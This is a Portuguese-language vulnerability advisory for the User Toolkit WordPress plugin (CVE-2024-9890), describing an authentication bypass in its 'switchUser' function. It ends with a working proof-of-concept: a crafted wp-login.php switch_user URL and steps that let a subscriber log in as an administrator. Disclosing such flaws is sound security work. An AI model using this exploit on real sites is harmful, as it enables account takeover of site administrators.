
User Toolkit <= 1.2.3 - Bypass de autenticação autenticado (Subscriber+)
User Toolkit <= 1.2.3 - Bypass de Autenticação Autenticado (Assinante+)
O plugin User Toolkit para WordPress é vulnerável a bypass de autenticação nas versões até, e incluindo, 1.2.3. Isso se deve a uma verificação de capacidade incorreta na função 'switchUser'. Isso possibilita que atacantes autenticados, com permissões de nível assinante ou superior, façam login como qualquer usuário existente no site, como um administrador.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
Faça login como seu usuário. Veja o código-fonte da sua página de perfil para capturar o valor do nonce. Altere o valor de user_from para o seu ID de usuário. Altere o user_id para o ID do administrador. Pronto!